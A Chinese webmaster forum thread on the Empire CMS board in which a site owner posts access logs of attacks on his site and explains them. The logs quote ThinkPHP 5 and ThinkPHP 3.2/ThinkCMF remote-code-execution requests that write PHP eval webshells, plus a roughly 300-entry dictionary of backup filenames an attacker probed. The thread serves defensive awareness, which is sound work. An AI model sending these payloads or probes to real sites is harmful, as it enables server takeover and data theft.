网站安全交流研究笔记帝国cms - 安全、强大、稳定、灵活

帝国论坛 → 帝国网站管理系统交流区 → 帝国CMS使用交流 → 网站安全交流研究笔记

【本版专题贴子】

jiuhecai
用户头衔：探花

精华贴   ：0
发贴数   ：3057
经验值   ：8745
注册时间：2014-07-02

信息

搜索

好友

发送悄悄话

【精益求精－帝国网站管理系统7.5正式版开源发布】 [第 1 楼]

网站安全交流研究笔记

今天新开一帖，专门和大家交流网站安全。

帝国插件插件定制。帝国临时工。查杀顽固木马。专业解决难题。qq--110102296

2022-12-13 07:55:34

已设置保密

顶部

引用

报告

编辑

删除

jiuhecai
用户头衔：探花

精华贴   ：0
发贴数   ：3057
经验值   ：8745
注册时间：2014-07-02

信息

搜索

好友

发送悄悄话

【免费开源－EBMA系统：更安全的MYSQL管理和备份系统】 [第 2 楼]

查网站日记，发现有php攻击，摘要如下：

222.186.30.188 - - [12/Dec/2022:08:08:47 +0800] "GET /index.php?s=admin/%5Cthink%5Capp/invokefunction&function=base64_encode&vars%5B%5D=ck996789baidu.com HTTP/1.1" 301 173 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
120.89.69.82 - - [12/Dec/2022:11:31:52 +0800] "GET /index.php/?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=sql.php&content=%3C?php%20@eval($_POST%5Bx%5D);?%3E HTTP/1.1" 301 173 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
120.89.69.82 - - [12/Dec/2022:11:31:56 +0800] "GET /index.php/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=sql.php&vars%5B1%5D%5B%5D=%3C?php%20@eval($_POST%5Bx%5D);?%3E HTTP/1.1" 301 173 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
222.186.30.188 - - [12/Dec/2022:22:27:50 +0800] "GET /index.php?s=admin/%5Cthink%5Capp/invokefunction&function=base64_encode&vars%5B%5D=ck996789baidu.com HTTP/1.1" 301 173 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
222.186.30.188 - - [13/Dec/2022:05:20:14 +0800] "GET /index.php?s=admin/%5Cthink%5Capp/invokefunction&function=base64_encode&vars%5B%5D=ck996789baidu.com HTTP/1.1" 301 173 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"

帝国插件插件定制。帝国临时工。查杀顽固木马。专业解决难题。qq--110102296

2022-12-13 07:56:53

已设置保密

顶部

引用

报告

编辑

删除

jiuhecai
用户头衔：探花

精华贴   ：0
发贴数   ：3057
经验值   ：8745
注册时间：2014-07-02

信息

搜索

好友

发送悄悄话

【精益求精－帝国网站管理系统7.5正式版开源发布】 [第 3 楼]

get后边的url网址decode后就是：

/index.php?s=admin/\think\app/invokefunction&function=base64_encode&vars[]=ck996789baidu.com

百度后知道这是 thinkphp5的漏洞，用thinkphp的注意了。

漏洞分析参考： https://blog.csdn.net/qq_41918771/article/details/106432188

帝国插件插件定制。帝国临时工。查杀顽固木马。专业解决难题。qq--110102296

2022-12-13 07:59:24

已设置保密

顶部

引用

报告

编辑

删除

cighsen02
用户头衔：进士

精华贴   ：0
发贴数   ：884
经验值   ：3407
注册时间：2009-09-29

信息

搜索

好友

发送悄悄话

【免费开源－EBMA系统：更安全的MYSQL管理和备份系统】 [第 4 楼]

不错，学习了，漏洞无处理不在，正式网站没有使用到这类框架

要上就上安心站长 www.axzz.cn q:365182575

2022-12-13 09:59:01

已设置保密

顶部

引用

报告

编辑

删除

jiuhecai
用户头衔：探花

精华贴   ：0
发贴数   ：3057
经验值   ：8745
注册时间：2014-07-02

信息

搜索

好友

发送悄悄话

【精益求精－帝国网站管理系统7.5正式版开源发布】 [第 5 楼]

网站代码和数据库或者插件的压缩包，不用保存在网站目录下。如果非要保留，请搞个别致的名字。你看，他们到我网站猜猜猜了。

13.66.19.188 - - [02/Dec/2022:18:06:40 +0800] "GET /bin.tar.tgz HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
13.66.19.188 - - [02/Dec/2022:18:06:40 +0800] "GET /sxoxgs.gz HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
13.66.19.188 - - [02/Dec/2022:18:06:40 +0800] "GET /data.rar HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
13.66.19.188 - - [02/Dec/2022:18:06:40 +0800] "GET /auth.tar.gz HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
.....

帝国插件插件定制。帝国临时工。查杀顽固木马。专业解决难题。qq--110102296

2022-12-13 12:31:38

已设置保密

顶部

引用

报告

编辑

删除

jiuhecai
用户头衔：探花

精华贴   ：0
发贴数   ：3057
经验值   ：8745
注册时间：2014-07-02

信息

搜索

好友

发送悄悄话

【免费开源－EBMA系统：更安全的MYSQL管理和备份系统】 [第 6 楼]

他美计使造了一个字典，一个一个的试着下载。我写了个正则把他们测试的文件名提取出来了。看吧：

Array
(
[0] => /clients.sql.gz
[1] => /test.sql.gz
[2] => /2012.tar.gz
[3] => /faisunzip.tar.gz
[4] => /2024.tar.gz
[5] => /sxoxgs.com.tar.tgz
[6] => /sxoxgs.com.rar
[7] => /log.tar.gz
[8] => /bin.tar.gz
[9] => /members.sql.gz
[10] => /2013.sql.gz
[11] => /tar.tar.gz
[12] => /files.sql.gz
[13] => /2025.sql.gz
[14] => /media.tar.gz
[15] => /test.tar.tgz
[16] => /database.rar
[17] => /2015.bak
[18] => /2013.tar.tgz
[19] => /php.rar
[20] => /sales.gz
[21] => /2024.tgz
[22] => /2012.tgz
[23] => /com.bak
[24] => /media.tgz
[25] => /tar.tgz
[26] => /wordpress.rar
[27] => /users.bak
[28] => /faisunzip.tgz
[29] => /files.tar.tgz
[30] => /js.rar
[31] => /back.rar
[32] => /sxoxgs_com.tar.tgz
[33] => /db.gz
[34] => /wp.gz
[35] => /home.bak
[36] => /sxoxgs_com.rar
[37] => /mysql.bak
[38] => /1.gz
[39] => /clients.tar.tgz
[40] => /bin.tgz
[41] => /log.tgz
[42] => /2019.rar
[43] => /members.tar.tgz
[44] => /2020.gz
[45] => /archive.bak
[46] => /jsp.gz
[47] => /backup.gz
[48] => /2025.tar.tgz
[49] => /database.tar.gz
[50] => /wordpress.tar.gz
[51] => /1.sql.gz
[52] => /php.tar.gz
[53] => /backup.sql.gz
[54] => /js.tar.gz
[55] => /wp.sql.gz
[56] => /www.rar
[57] => /www.tar.tgz
[58] => /sales.sql.gz
[59] => /jsp.sql.gz
[60] => /back.tar.gz
[61] => /2020.sql.gz
[62] => /db.sql.gz
[63] => /2019.tar.gz
[64] => /2014.rar
[65] => /user.rar
[66] => /forum.rar
[67] => /1.tar.tgz
[68] => /code.rar
[69] => /admin.rar
[70] => /localhost.bak
[71] => /mysql.gz
[72] => /home.gz
[73] => /my.rar
[74] => /db.tar.tgz
[75] => /bak.bak
[76] => /wp.tar.tgz
[77] => /2010.bak
[78] => /back.tgz
[79] => /archive.gz
[80] => /sxoxgs.tar.tgz
[81] => /php.tgz
[82] => /2015.gz
[83] => /wordpress.tgz
[84] => /js.tgz
[85] => /wwwroot.bak
[86] => /users.gz
[87] => /2019.tgz
[88] => /backup.tar.tgz
[89] => /engine.bak
[90] => /com.gz
[91] => /sales.tar.tgz
[92] => /sql.bak
[93] => /database.tgz
[94] => /2020.tar.tgz
[95] => /jsp.tar.tgz
[96] => /sxoxgs.rar
[97] => /2022.bak
[98] => /code.tar.gz
[99] => /users.sql.gz
[100] => /admin.tar.gz
[101] => /home.sql.gz
[102] => /www.sxoxgs.com.tar.gz
[103] => /mysql.sql.gz
[104] => /forum.tar.gz
[105] => /archive.sql.gz
[106] => /2015.sql.gz
[107] => /2014.tar.gz
[108] => /my.tar.gz
[109] => /www.sxoxgs.com.gz
[110] => /com.sql.gz
[111] => /user.tar.gz
[112] => /wwwsxoxgscom.tar.gz
[113] => /localhost.gz
[114] => /bak.gz
[115] => /engine.gz
[116] => /archive.tar.tgz
[117] => /aspx.bak
[118] => /home.tar.tgz
[119] => /bak.sql.gz
[120] => /forum.tgz
[121] => /com.tar.tgz
[122] => /2010.gz
[123] => /2022.gz
[124] => /2015.tar.tgz
[125] => /site.rar
[126] => /index.bak
[127] => /dump.rar
[128] => /admin.tgz
[129] => /2017.bak
[130] => /2021.rar
[131] => /engine.sql.gz
[132] => /wwwroot.gz
[133] => /local.rar
[134] => /dat.bak
[135] => /2014.tgz
[136] => /sql.gz
[137] => /www_sxoxgs_com.tar.gz
[138] => /localhost.sql.gz
[139] => /wwwsxoxgscom.gz
[140] => /users.tar.tgz
[141] => /web.bak
[142] => /my.tgz
[143] => /mysql.tar.tgz
[144] => /old.bak
[145] => /code.tgz
[146] => /backups.rar
[147] => /127.0.0.1.rar
[148] => /user.tgz
[149] => /www.rar
[150] => /2021.tar.gz
[151] => /site.tar.gz
[152] => /dump.tar.gz
[153] => /faisunzip.bak
[154] => /127.0.0.1.tar.gz
[155] => /localhost.tar.tgz
[156] => /backups.tar.gz
[157] => /sql.sql.gz
[158] => /www.tar.gz
[159] => /wwwroot.sql.gz
[160] => /www_sxoxgs_com.gz
[161] => /bak.tar.tgz
[162] => /tar.bak
[163] => /engine.tar.tgz
[164] => /local.tar.gz
[165] => /sxoxgscom.tar.gz
[166] => /2010.sql.gz
[167] => /media.bak
[168] => /2022.sql.gz
[169] => /dump.tgz
[170] => /aspx.gz
[171] => /sql.tar.tgz
[172] => /2021.tgz
[173] => /2012.bak
[174] => /wwwroot.tar.tgz
[175] => /backups.tgz
[176] => /old.gz
[177] => /new.rar
[178] => /web.gz
[179] => /sxoxgs.com.tar.gz
[180] => /customers.rar
[181] => /sxoxgscom.gz
[182] => /2010.tar.tgz
[183] => /127.0.0.1.tgz
[184] => /asp.rar
[185] => /bin.bak
[186] => /vb.rar
[187] => /local.tgz
[188] => /html.rar
[189] => /index.gz
[190] => /site.tgz
[191] => /dat.gz
[192] => /1.rar
[193] => /log.bak
[194] => /2022.tar.tgz
[195] => /2024.bak
[196] => /2017.gz
[197] => /www.tgz
[198] => /2016.rar
[199] => /aspx.sql.gz
[200] => /web.sql.gz
[201] => /sxoxgs_com.tar.gz
[202] => /index.sql.gz
[203] => /master.rar
[204] => /back.bak
[205] => /tar.gz
[206] => /customers.tar.gz
[207] => /old.sql.gz
[208] => /bbs.rar
[209] => /media.gz
[210] => /html.tar.gz
[211] => /error_log.rar
[212] => /vb.tar.gz
[213] => /dat.sql.gz
[214] => /faisunzip.gz
[215] => /asp.tar.gz
[216] => /2017.sql.gz
[217] => /sxoxgs.com.gz
[218] => /new.tar.gz
[219] => /1.tar.gz
[220] => /2016.tar.gz
[221] => /store.rar
[222] => /aspx.tar.tgz
[223] => /root.rar
[224] => /www.tar.gz
[225] => /2019.bak
[226] => /web.tar.tgz
[227] => /2012.gz
[228] => /customers.tgz
[229] => /master.tar.gz
[230] => /old.tar.tgz
[231] => /tar.sql.gz
[232] => /bbs.tar.gz
[233] => /index.tar.tgz
[234] => /js.bak
[235] => /database.bak
[236] => /html.tgz
[237] => /error_log.tar.gz
[238] => /asp.tgz
[239] => /faisunzip.sql.gz
[240] => /php.bak
[241] => /wordpress.bak
[242] => /2011.rar
[243] => /vb.tgz
[244] => /dat.tar.tgz
[245] => /media.sql.gz
[246] => /2017.tar.tgz
[247] => /bin.gz
[248] => /2023.rar
[249] => /log.gz
[250] => /2016.tgz
[251] => /2024.gz
[252] => /1.tgz
[253] => /new.tgz
[254] => /sxoxgs_com.gz
[255] => /store.tar.gz
[256] => /root.tar.gz
[257] => /sxoxgs.tar.gz
[258] => /2012.sql.gz
[259] => /tar.tar.tgz
[260] => /bbs.tgz
[261] => /master.tgz
[262] => /back.gz
[263] => /error_log.tgz
[264] => /faisunzip.tar.tgz
[265] => /2011.tar.gz
[266] => /media.tar.tgz
[267] => /2023.tar.gz
[268] => /bin.sql.gz
[269] => /auth.rar
[270] => /store.tgz
[271] => /2014.bak
[272] => /www.gz
[273] => /2024.sql.gz
[274] => /log.sql.gz
[275] => /root.tgz
[276] => /www.sxoxgs.com.tgz
[277] => /website.rar
[278] => /forum.bak
[279] => /2012.tar.tgz
[280] => /2019.gz
[281] => /orders.rar
[282] => /back.sql.gz
[283] => /joomla.rar
[284] => /database.gz
[285] => /js.gz
[286] => /my.bak
[287] => /admin.bak
[288] => /php.gz
[289] => /wordpress.gz
[290] => /2023.tgz
[291] => /2011.tgz
[292] => /2018.rar
[293] => /code.bak
[294] => /user.bak
[295] => /bin.tar.tgz
[296] => /sxoxgs.gz
[297] => /data.rar
[298] => /auth.tar.gz
)

帝国插件插件定制。帝国临时工。查杀顽固木马。专业解决难题。qq--110102296

2022-12-13 12:34:32

已设置保密

顶部

引用

报告

编辑

删除

jiuhecai
用户头衔：探花

精华贴   ：0
发贴数   ：3057
经验值   ：8745
注册时间：2014-07-02

信息

搜索

好友

发送悄悄话

【精益求精－帝国网站管理系统7.5正式版开源发布】 [第 7 楼]

再看一个php攻击

107.148.30.177 - - [04/Dec/2022:01:58:34 +0800] "GET //?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('hmseo.php','<?php%20@eval($_POST[hm]);?>hmseo')</php> HTTP/1.1" 200 28852 "https://www.sxoxgs.com//?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('hmseo.php','<?php @eval($_POST[hm]);?>hmseo')</php>" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"

这个家伙试图利用漏洞把一句话木马 <?php @eval($_POST[hm]);?> 生成到文件hmseo.php里。百度了下，这是TP3.2，ThinkCMF等构架下的漏洞。
可惜。我用的帝国cms，他们白忙活！

[该贴被修改 1 次，最后修改时间 2022-12-13 12:48:52 ]

帝国插件插件定制。帝国临时工。查杀顽固木马。专业解决难题。qq--110102296

2022-12-13 12:48:38

已设置保密

顶部

引用

报告

编辑

删除